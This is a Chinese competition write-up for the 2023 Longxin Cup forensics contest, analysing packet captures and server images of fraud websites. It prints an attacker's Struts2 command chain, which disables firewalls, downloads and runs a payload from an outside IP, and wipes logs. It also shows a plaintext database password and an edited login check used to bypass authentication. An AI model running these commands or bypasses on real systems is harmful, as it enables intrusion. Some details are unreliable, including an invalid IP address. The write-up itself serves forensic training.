2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分)

流量分析（共8题，合计22分）请根据流量包进行以下题目回答

分析“数据包1.cap”，请问客户端为什么访问不了服务器。（ ）

A.DDoS攻击

B.DoS攻击

C.sql注入

D.文档攻击

DOS攻击，特征是短时间内tcp很高

分析“数据包1.cap”，出问题的服务器IP地址是_______。（格式：127.0.0.1）

跳过，之后分析

分析“数据包1.cap”，文件下发服务器的IP地址是_______。（标准格式：127.0.0.1）

跳过，之后分析

分析“数据包1.cap”，攻击者利用_______漏洞进行远程代码执行。（标准格式：XXX）

Http.response.code==404

这看起来是一个尝试利用开放的漏洞来执行恶意代码的攻击代码。具体来说，这段代码似乎是一个针对使用 Apache Struts 2 框架的应用程序的攻击尝试。这种攻击通常被称为远程代码执行（Remote Code Execution，RCE）攻击。以下是代码的简要分析：1. 代码首先尝试将请求标记为 "multipart/fORM-data"，这可能是为了触发文件上传漏洞。2. 接下来，代码似乎在尝试利用 Apache Struts 2 的漏洞，使用特定的对象和方法来执行操作，以获取操作系统信息。3. 代码检查操作系统是否是 windows，并根据不同的操作系统执行不同的命令。4. 代码创建一个进程，执行操作系统命令（例如，"whoami"），并将命令的输出流传输回攻击者。5. 最后，代码将输出流复制到响应流中，并刷新响应，以将结果发送回攻击者。这段代码的目的似乎是尝试执行操作系统命令，并将命令的输出返回给攻击者。这种攻击可以导致严重的安全问题，因为攻击者可以在受害者服务器上执行恶意操作。要保护应用程序免受此类攻击，建议采取以下安全措施：1. 及时更新和维护应用程序依赖项，包括框架和库，以确保安全漏洞得到修复。2. 配置安全策略，限制应用程序的执行权限，尤其是不要允许执行任意操作系统命令。3. 实施输入验证和过滤，以防止恶意输入进入应用程序。4. 使用 WEB 应用程序防火墙（WAF）和入侵检测系统（IDS）等安全工具，以检测和阻止恶意请求。5. 进行安全审计和漏洞扫描，以定期检查应用程序中的潜在漏洞。6. 涉及文件上传功能时，对上传文件进行适当的验证和过滤，以防止恶意文件上传。请注意，上述安全措施只是一些基本建议，实际应根据具体的应用程序和环境来制定更详细的安全策略。

这里找到了payload，我们就用pyshark提取一下

import reimport pysharkcap = pyshark.FileCapture(r"E:\2023-龙信杯检材容器\2023龙信杯检材\流量包\流量包\数据包1.cap",                          display_filter='http.request or (http.request and mime_multipart) or (http.response and data-text-lines)')cookies = []for pkt in cap:    try:        http = pkt['HTTP']        try:            print(re.findall(r"\(#cmd='(.*?)'\)", http.content_type)[0])        except:            pass    except:        pass'''whoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiservice iptables stopwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoamiwhoami/etc/init.d/iptables stopSuSEfirewall2 stopreSuSEfirewall2 stoppkill -9 java.log;pkill -9 Manager;pkill -9 ntpssh;pkill -9 Lin.1;pkill -9 syn188;pkill -9 sy;pkill -9 udpwget http://120.210.129.29:5198/java.logcurl -O http://120.210.129.29:5198/java.logchmod +x java.lognohup ./java.log >/dev/null 2>&1 &/java.log &chattr +i java.logrm -f java.log.1;rm -f java.log.2;rm -rf ntpssh;rm -rf Manager;rm -rf Lin.1;rm -rf syn188;rm -rf sy;rm -rf udpmv /usr/bin/wget /usr/bin/scetmv /usr/bin/curl /usr/bin/cuyecho > /var/log/wtmp echo >/var/log/wtmpecho > ./.bash_historyecho > ./.bash_history'''

这段代码看起来是一系列命令行操作，但它包含了一些不寻常和潜在恶意的操作。我强烈建议不要运行或者尝试类似的操作，因为它们可能会对系统产生严重的负面影响，并且可能违反了计算机系统的安全政策。以下是此代码中执行的操作的简要描述：1. `whoami`：显示当前用户的用户名。在这个脚本中被多次调用，用于显示当前用户身份。2. `service iptables stop`：停止iptables防火墙服务。这可能会导致系统的网络安全性降低。3. `/etc/init.d/iptables stop`：停止iptables防火墙的另一种方式。4. `SuSEfirewall2 stop` 和 `reSuSEfirewall2 stop`：停止SuSE Linux中的防火墙服务。5. `pkill -9`：使用SIGKILL信号强制终止进程。该命令被用来终止多个不同的进程，包括名为java.log、Manager、ntpssh、Lin.1、syn188、sy和udp的进程。这可能会导致运行这些进程的应用程序被突然关闭，可能会导致数据损坏或系统不稳定。6. `wget` 和 `curl` 命令：从指定URL下载文件，然后赋予该文件可执行权限并在后台运行它。这可能会导致恶意代码在系统上执行。7. `chattr +i java.log`：将文件java.log标记为不可修改，这意味着无法修改或删除该文件。8. `rm -f`：删除文件和目录，包括java.log.1、java.log.2、ntpssh、Manager、Lin.1、syn188、sy和udp。这可能会导致数据丢失。9. `mv`：移动文件，将wget命令移动到scet，将curl命令移动到cuy。这可能是为了欺骗用户或混淆系统。10. `echo >`：将空内容写入文件，包括wtmp和.bash_history，以清除它们的内容。综合来看，这段代码包含了一系列可能会对系统和数据安全性造成严重影响的操作，可能是恶意操作的一部分。强烈建议不要运行这段代码，如果您遇到类似的操作，请立即采取适当的安全措施，如断开与网络的连接，并检查系统以确定是否遭受了攻击。

这里出现了文件下发的ip地址120.210.129.29

出问题的服务器IP地址可能是222.286.21.154

分析“数据包1.cap”，请提取恶意文件，并校验该文件的MD5值为_______。(标准格式:abcd)

导出java.log对象

87540c645d003e6eebf1102e6f904197

分析“数据包2.cap”，其获取文件的路径是________。（标准格式：D:/X/X/1.txt）

import pysharkfrom urllib import parsecap = pyshark.FileCapture(r"E:\2023-龙信杯检材容器\2023龙信杯检材\流量包\流量包\数据包2.cap", display_filter='http')cookies = []for pkt in cap:    http = pkt['HTTP']    try:        print(parse.unquote(http.response_for_uri))    except:        # print(parse.unquote(http.request_full_uri))        pass    '''http://192.168.43.133/C:/Users/Administrator/Downloads/新建文件夹/新建文件夹http://192.168.43.133/C:/Users/Administrator/Downloads/新建文件夹/新建文件夹http://192.168.43.133/C:/Users/Administrator/Downloads/新建文件夹/新建文件夹http://192.168.43.133/favicon.icohttp://192.168.43.133/favicon.icohttp://192.168.43.133/C:/Users/Administrator/Downloads/新建文件夹/新建文件夹/mail.png'''

分析“数据包2.cap”，文件下载服务器的认证账号密码是_______。（标准格式：123）

分析“数据包2.cap”，其下载的文件名大小有________字节。（标准格式：123）

服务器取证1（共10题，合计29分）请根据服务器镜像1进行以下题目回答

服务器系统的版本号是_______。(格式:1.1.1111)

[root@localhost ~]# cat /etc/*-releaseCentos linux release 7.9.2009 (Core)NAME="CentOS Linux"VERSION="7 (Core)"ID="centos"ID_LIKE="rhel fedora"VERSION_ID="7"PRETTY_NAME="CentOS Linux 7 (Core)"ANSI_COLOR="0;31"CPE_NAME="cpe:/o:centos:centos:7"HOME_URL="https://www.centos.org/"BUG_REPORT_URL="https://bugs.centos.org/"CENTOS_MANTISBT_PROJECT="CentOS-7"CENTOS_MANTISBT_PROJECT_VERSION="7"REDHAT_SUPPORT_PRODUCT="centos"REDHAT_SUPPORT_PRODUCT_VERSION="7"CentOS Linux release 7.9.2009 (Core)CentOS Linux release 7.9.2009 (Core)

2009

网站数据库的版本号是_______。(格式:1.1.1111)

[root@localhost ~]# systemctl restart mysqld[root@localhost ~]# mysql -uroot -pEnter password: Welcome to the MySQL monitor.  Commands end with ; or \g.Your MySQL connection id is 1Server version: 5.6.50-log Source distributionCopyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved.Oracle is a registered trademark of Oracle Corporation and/or itsaffiliates. Other names may be trademarks of their respectiveowners.Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.mysql> select @@version;+------------+| @@version  |+------------+| 5.6.50-log |+------------+1 row in set (0.00 sec)

宝塔面板的“超时”时间是_______分钟。(格式:50)

网站源码备份压缩文件SHA256值是_______。(格式:64位小写)

[root@localhost www]# find ./ -name "*.tar.gz" 2>/dev/null./server/Nginx/src/pcre-8.43.tar.gz./server/data.tar.gz./backup/site/wwwroot.tar.gz./dk_project/templates/nextcloud.tar.gz./dk_project/templates/Redis.tar.gz./dk_project/templates/jenkins.tar.gz./dk_project/templates/gitlab-ce.tar.gz./dk_project/templates/kodbox.tar.gz./dk_project/templates/mongoDB.tar.gz./dk_project/templates/nexus3.tar.gz./dk_project/templates/awvs.tar.gz./dk_project/templates/kafka.tar.gz./dk_project/templates/solr.tar.gz./dk_project/templates/Gogs.tar.gz./dk_project/templates/teleport.tar.gz./dk_project/templates/prometheus.tar.gz./dk_project/templates/metabase.tar.gz./dk_project/templates/grafana.tar.gz./dk_project/templates/Nacos.tar.gz[root@localhost www]# sha2sha224sum  sha256sum  [root@localhost www]# sha256sum ./backup/site/wwwroot.tar.gz0bdeeacf755126dae9efd38f6a6d70323aa95217b629fd389e0e81f9b406be39  ./backup/site/wwwroot.tar.gz

分发网站sb.wiiudot.cn管理员密码默认MD5加密盐值是_______。(格式:abcd)

PHPstorm追踪passWord函数

因为对thinkphp这个框架熟悉，所以找到了Common.php，如果不熟悉的同学可以先把网站重构起来再仿真

分发网站sb.wiiudot.cn一共存放了_______条通讯录数据。（标准格式:1234）

下面进行网站重构

/www/wwwroot/sb.wiiudot.cn/app/database.php

// +----------------------------------------------------------------------// | ThinkPHP [ WE CAN DO IT JUST THINK ]// +----------------------------------------------------------------------// | Copyright (c) 2006~2016 http://thinkphp.cn All rights reserved.// +----------------------------------------------------------------------// | Licensed ( http://www.apache.org/licenses/LICENSE-2.0 )// +----------------------------------------------------------------------// | Author: liu21st // +----------------------------------------------------------------------return [    // 数据库类型    'type'            => 'Mysql',    // 服务器地址    'hostname'        => '127.0.0.1',    // 数据库名    'database'        => 'sb_wiiudot_cn',    // 用户名    'username'        => 'root',    // 密码    'password'        => 'lSfXN770ZPjte9m',    // 端口    'hostport'        => '3306',    // 连接dsn    'dsn'             => '',    // 数据库连接参数    'params'          => [],    // 数据库编码默认采用utf8    'charset'         => 'utf8',    // 数据库表前缀    'prefix'          => 'app_',    // 数据库调试模式    'debug'           => true,    // 数据库部署方式:0 集中式(单一服务器),1 分布式(主从服务器)    'deploy'          => 0,    // 数据库读写是否分离 主从式有效    'rw_separate'     => false,    // 读写分离后 主服务器数量    'master_num'      => 1,    // 指定从服务器序号    'slave_no'        => '',    // 是否严格检查字段是否存在    'fields_strict'   => true,    // 数据集返回类型    'resultset_type'  => 'array',    // 自动写入时间戳字段    'auto_timestamp'  => true,    // 时间字段取出后的默认时间格式    'datetime_format' => 'Y-m-d H:i:s',    // 是否需要进行SQL性能分析    'sql_explain'     => false,];

把ip指向自己，修改用户名

查看nginx配置文件，发现三个网站的端口都是80

[root@localhost app]# cd /www/server/panel/vhost/nginx[root@localhost nginx]# ls0.default.conf  phpfpm_status.conf  sb.wiiudot.cn.conf  tcp  tf.chongwuxiaoyouxi.com.conf  wiiudot.cn.conf[root@localhost nginx]# cat sb.wiiudot.cn.conf server{    listen 80;    server_name sb.wiiudot.cn;    index index.php index.html index.htm default.php default.htm default.html;    root /www/wwwroot/sb.wiiudot.cn/public;    #SSL-START SSL相关配置，请勿删除或修改下一行带注释的404规则    #error_page 404/404.html;    #SSL-END    #ERROR-PAGE-START  错误页配置，可以注释、删除或修改    #error_page 404 /404.html;    #error_page 502 /502.html;    #ERROR-PAGE-END    #PHP-INFO-START  PHP引用配置，可以注释或修改    include enable-php-56.conf;    #PHP-INFO-END    #REWRITE-START URL重写规则引用,修改后将导致面板设置的伪静态规则失效    include /www/server/panel/vhost/rewrite/sb.wiiudot.cn.conf;    #REWRITE-END    #禁止访问的文件或目录    location ~ ^/(\.user.ini|\.htaccess|\.git|\.env|\.svn|\.project|LICENSE|README.md)    {        return 404;    }    #一键申请SSL证书验证目录相关设置    location ~ \.well-known{        allow all;    }    #禁止在证书验证目录放入敏感文件    if ( $uri ~ "^/\.well-known/.*\.(php|jsp|py|js|CSS|lua|ts|go|zip|tar\.gz|rar|7z|sql|bak)$" ) {        return 403;    }    location ~ .*\.(gif|jpg|jpeg|png|bmp|swf)$    {        expires      30d;        error_log /dev/null;        access_log /dev/null;    }    location ~ .*\.(js|css)?$    {        expires      12h;        error_log /dev/null;        access_log /dev/null;    }    access_log  /www/wwwlogs/sb.wiiudot.cn.log;    error_log  /www/wwwlogs/sb.wiiudot.cn.error.log;}

[root@localhost nginx]# bt 23 && bt 11 && bt 12 && bt 13 && bt 24 && bt 5===============================================正在执行(23)...===============================================Reload Bt-Panel..done|-已关闭BasicAuth认证===============================================正在执行(11)...===============================================|-已开启IP + User-Agent检测|-此功能可以有效防止[重放攻击]===============================================正在执行(12)...===============================================Reload Bt-Panel..done|-已取消域名访问限制===============================================正在执行(13)...===============================================Reload Bt-Panel..done|-已取消IP访问限制===============================================正在执行(24)...===============================================|-已关闭谷歌认证===============================================正在执行(5)...===============================================请输入新的面板密码：123456|-用户名: sultfaen|-新密码: 123456[root@localhost nginx]# bt 14===============================================正在执行(14)...=================================================================================================================BT-Panel default info!==================================================================外网面板地址:  https://36.113.29.197:12738/4a468245内网面板地址:  https://192.168.110.131:12738/4a468245username: sultfaenpassword: ********If you cannot access the panel,release the following panel port [12738] in the security group若无法访问面板，请检查防火墙/安全组是否有放行面板[12738]端口注意：初始密码仅在首次登录面板前能正确获取，其它时间请通过 bt 5 命令修改密码==================================================================

案例剖析：解决宝塔强制手机绑定问题的取证技巧与方法

我觉得这里可以用自己的账号方便一点（

到这里说明成功了，后续看日志找后台，发现是/admin

mysql> mysql> select * from app_admin limit 0,1;+----+----------+-------+----------------------------------+-------+-------------+-------------+------------+---------------+---------------+| id | nickname | name  | password                         | thumb | create_time | update_time | login_time | login_ip      | admin_cate_id |+----+----------+-------+----------------------------------+-------+-------------+-------------+------------+---------------+---------------+|  1 | 三叶     | admin | 81dbdde41342ef4304ed3f0bf6041278 |     9 |  1510885948 |  1597312087 | 1693121146 | 192.168.110.1 |             1 |+----+----------+-------+----------------------------------+-------+-------------+-------------+------------+---------------+---------------+1 row in set (0.00 sec)

这里绕密的方法有很多，我选择更改判断逻辑

if($name['password'] != $post['password']) {                        return $this->error('密码错误');                    } else {                        //是否记住账号                        if(!empty($post['remember']) and $post['remember'] == 1) {//检查当前有没有记住的账号if(Cookie::has('usermember')) {    Cookie::delete('usermember');}//保存新的Cookie::forever('usermember',$post['name']);                        } else {//未选择记住账号，或属于取消操作if(Cookie::has('usermember')) {    Cookie::delete('usermember');}                        }                        Session::set("admin",$name['id']); //保存新的                        Session::set("admin_cate_id",$name['admin_cate_id']); //保存新的                        //记录登录时间和ip                        Db::name('admin')->where('id',$name['id'])->update(['login_ip' =>  $this->request->ip(),'login_time' => time()]);                        //记录操作日志                        addlog();                        if(!cache('sessionIds')){//创建一个数组，将id作为key把session_id作为值存到缓存中$sessionIds = [];$sessionIds[$name['id']] = session_id();cache('sessionIds',$sessionIds);                        }else{//找到登录id 对应的session_id值并改变这个值$sessionIds = cache('sessionIds');$sessionIds[$name['id']] = session_id();cache('sessionIds',$sessionIds);                        }                        return $this->success('登录成功,正在跳转...','admin/index/index');                    }

if($name['password'] == $post['password'])

但是这跟数据库里的不一样

答案应该是67277

全部网站一共有_______名受害人。(格式:xxx。不去重,不进行数据恢复)

接下来几个网站架构都是一样的，就是数据库不同，不多做赘述

但是在重构第三个网站的时候出现了问题

我选择不去分析逻辑，将另一个网站的源码copy过去，修改数据库指向

回到题目本身，分别对sanye123，sql_0731_wiiudot，sb_wiiudot_cn做数据去重

分发网站tf.chongwuxiaoyouxi.com里面一共有_______位“组员级别”的管理员。(格式:数字)

分发网站sb.wiiudot.cn管理员名为“0820”的邀请码是_______。(格式:xxx)

分发网站sb.wiiudot.cn本地数据库用户sb_wiiudot_cn的密码是_______。(格式:xxx)

/www/wwwroot/sb.wiiudot.cn/app/database.php

// +----------------------------------------------------------------------// | ThinkPHP [ WE CAN DO IT JUST THINK ]// +----------------------------------------------------------------------// | Copyright (c) 2006~2016 http://thinkphp.cn All rights reserved.// +----------------------------------------------------------------------// | Licensed ( http://www.apache.org/licenses/LICENSE-2.0 )// +----------------------------------------------------------------------// | Author: liu21st // +----------------------------------------------------------------------return [    // 数据库类型    'type'            => 'mysql',    // 服务器地址    'hostname'        => '127.0.0.1',    // 数据库名    'database'        => 'sb_wiiudot_cn',    // 用户名    'username'        => 'root',    // 密码    'password'        => 'lSfXN770ZPjte9m',    // 端口    'hostport'        => '3306',    // 连接dsn    'dsn'             => '',    // 数据库连接参数    'params'          => [],    // 数据库编码默认采用utf8    'charset'         => 'utf8',    // 数据库表前缀    'prefix'          => 'app_',    // 数据库调试模式    'debug'           => true,    // 数据库部署方式:0 集中式(单一服务器),1 分布式(主从服务器)    'deploy'          => 0,    // 数据库读写是否分离 主从式有效    'rw_separate'     => false,    // 读写分离后 主服务器数量    'master_num'      => 1,    // 指定从服务器序号    'slave_no'        => '',    // 是否严格检查字段是否存在    'fields_strict'   => true,    // 数据集返回类型    'resultset_type'  => 'array',    // 自动写入时间戳字段    'auto_timestamp'  => true,    // 时间字段取出后的默认时间格式    'datetime_format' => 'Y-m-d H:i:s',    // 是否需要进行SQL性能分析    'sql_explain'     => false,];

但这个密码是错的，备份文件里的database.php的密码是对的

验证一下

服务器取证2（共13题，合计39分）请根据服务器镜像2进行以下题目回答

请分析宝塔面板中默认建站目录是_______。（标准格式：/etc/www）

/www/server/panel/data/default.db

在宝塔数据库目录有一个只含有一个表结构的数据库，请找到该“表结构文件”并分析出第六个字段的字段类型是_______。（标准格式：int(11)）

请分析“乐享金融”网站绑定的域名是_______。（标准格式：www.baidu.com）

[root@localhost data]# cd /www/server/panel/vhost/nginx[root@localhost nginx]# ls0.default.conf  192.168.19.128.conf  phpfpm_status.conf  tcp[root@localhost nginx]# cat 192.168.19.128.conf server{    listen 80;    server_name jinrong.goyasha.com;    index index.php index.html index.htm default.php default.htm default.html;    root /www/wwwroot/192.168.19.128/public;    #SSL-START SSL相关配置，请勿删除或修改下一行带注释的404规则    #error_page 404/404.html;    #SSL-END    #ERROR-PAGE-START  错误页配置，可以注释、删除或修改    #error_page 404 /404.html;    #error_page 502 /502.html;    #ERROR-PAGE-END    #PHP-INFO-START  PHP引用配置，可以注释或修改    include enable-php-00.conf;    #PHP-INFO-END    #REWRITE-START URL重写规则引用,修改后将导致面板设置的伪静态规则失效    include /www/server/panel/vhost/rewrite/192.168.19.128.conf;    #REWRITE-END    #禁止访问的文件或目录    location ~ ^/(\.user.ini|\.htaccess|\.git|\.svn|\.project|LICENSE|README.md)    {        return 404;    }    #一键申请SSL证书验证目录相关设置    location ~ \.well-known{        allow all;    }    location ~ .*\.(gif|jpg|jpeg|png|bmp|swf)$    {        expires      30d;        error_log /dev/null;        access_log /dev/null;    }    location ~ .*\.(js|css)?$    {        expires      12h;        error_log /dev/null;        access_log /dev/null;    }    access_log  /www/wwwlogs/192.168.19.128.log;    error_log  /www/wwwlogs/192.168.19.128.error.log;}

jinrong.goyasha.com

请访问“乐享金融”数据库并找到用户表，假设密码为123456，还原uid为2909，用户名为goyasha加密后密码的值是_______。（标准格式：abcdefghijklmnopqrstuvwsyz）

我选择本地重构网站

mysql> show variables like "%datadir%";+---------------+-------------------+| Variable_name | Value             |+---------------+-------------------+| datadir       | /www/server/data/ |+---------------+-------------------+1 row in set (0.00 sec)mysql> select @@version;+------------+| @@version  |+------------+| 5.6.50-log |+------------+1 row in set (0.00 sec)

找数据目录，确定数据库版本

[root@localhost ~]# php -vPHP Warning:  PHP Startup: Unable to load dynamic library '/www/server/php/55/lib/php/extensions/no-debug-non-zts-20121212/zip.so' - /www/server/php/55/lib/php/extensions/no-debug-non-zts-20121212/zip.so: cannot open shared object file: No such file or directory in Unknown on line 0PHP 5.5.38 (cli) (built: May 13 2020 16:03:24) Copyright (c) 1997-2015 The PHP GroupZend Engine v2.5.0, Copyright (c) 1998-2015 Zend Technologies

确定php版本

替换data目录

绕密，否则无法连接数据库

根目录不用加public

基本的绕密

成功登录后台，但是无法正常显示数据

回到题目

这是加密逻辑

md5($data['password'].$result['utime'])

查询utime

请重建“乐享金融”，访问平台前台登陆界面，会员登陆界面顶部LOGO上的几个字是_______。（标准格式：爱金融）

睿文化

请分析“乐享金融”一共添加了_______个非外汇产品。（标准格式：5）

网站里是两个，数据库翻一翻

请分析“乐享金融”设置充值泰达币的地址是_______。（标准格式：EDFGF97B46234FDADSDF0270CB3E）

请分析“乐享金融”充值金额大于582402元的受害人充值总金额是_______。（标准格式：12345678）

请分析“乐享金融”银行卡号“6239039472846284913”绑定用户的用户名是_______。（标准格式：张三）

这里有两张干扰的表格wp_bankcard和wp_userinfo

这里的张教瘦是accountname并不是username

请分析“乐享金融”建仓时间为“2022/03/01 18:44:01”，平仓时间为“2022/03/01 18:52:01”，以太坊/泰达币的这一笔交易的平仓价格是_______。（标准格式：1888.668）

请分析“乐享金融”订单编号为“202112090946233262”平仓时间是_______。（标准格式：2022-1-11.1:22:43）

导入备份的sql文件

宝塔面板某用户曾尝试进行一次POST请求，参数为“/BTCloud?action=UploadFilesData”，请问该用户疑似使用的（ ）电脑系统进行访问请求的。

A.Windows 8.1

B.Windows 10

C.Windows 11

D.Windows Server 2000

/www/server/panel/logs/request全部拉出来

Windows NT 6.3是指Windows操作系统的一个内部版本号。它对应于Windows 8.1和Windows Server 2012 R2。这个版本于2013年发布，是Windows 8的升级版本，引入了一些改进和新功能，以提升用户体验和系统性能。但需要注意的是，Windows 8和Windows 8.1并不像Windows XP、Windows 7等之间的转变那么显著，因此它们在很多方面的界面和功能都比较相似。

请分析该服务器镜像最高权限“root”账户的密码是_______。（标准格式：a123456）

参考文章：第一届“龙信杯”电子数据取证竞赛Writeup-CSDN博客

b3nguang写于2023/9/26

来源地址：https://blog.csdn.net/weixin_72667582/article/details/133338671